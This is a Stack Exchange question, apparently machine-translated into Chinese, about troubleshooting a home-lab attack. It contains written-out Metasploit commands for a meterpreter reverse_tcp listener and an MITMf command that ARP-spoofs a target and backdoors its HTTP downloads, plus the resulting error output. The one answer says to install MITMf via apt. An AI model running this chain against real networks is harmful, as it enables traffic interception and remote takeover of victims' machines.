我正试图向http请求中注入恶意有效负载。我拥有一个个人lamp服务器,一个Kali VM和一个最能想象到的WindowsXP VM。一切都在我的网络和法律上。我一直在学习本教程。
我运行metasploit时使用了以下内容
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set LPORT 8843
exploit -j在观看视频时,Metasploit说
[*] Starting the payload handler...在我的一端,它首先说,然后带我回到控制台。奇怪,但不管我怎么想。
现在,我试图在另一个终端窗口中运行mitmf。
sudo ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.244 --filepwn这是我从mitmf收到的错误消息。
[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Spoof v0.6
| |_ ARP spoofing enabled
|_ FilePwn v0.3
| |_ BDFProxy v0.3.2 online
2018-07-17 02:23:27 [ARPpoisoner] Restoring connection 192.168.1.244 <-> 192.168.1.1 with 2 packets per host
[Msfrpc] Error connecting to Metasploit: HTTPConnectionPool(host='127.0.0.1', port=55552): Max retries exceeded with url: /api/ (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7fd9b7772290>: Failed to establish a new connection: [Errno 111] Connection refused',))我搜索了一下,找到了这条线。
https://github.com/byt3bl33d3r/MITMf/issues/343
我遵循了他的2条指令,然后在没有运气的情况下重新开始了整个过程。我甚至试着把LPORT改为55552,但也失败了。我不是Metasploit的专家,所以我甚至不知道该找什么。如何进一步排除此问题?
发布于 2018-07-17 08:08:49
如果您使用的是Kali,请使用下面的命令来安装MITMf来解决这个问题
apt-get install mitmf即使软件作者提供的原始指令按预期的那样工作,没有错误,它们仍然是可悲的可怕。
https://security.stackexchange.com/questions/189742
复制相似问题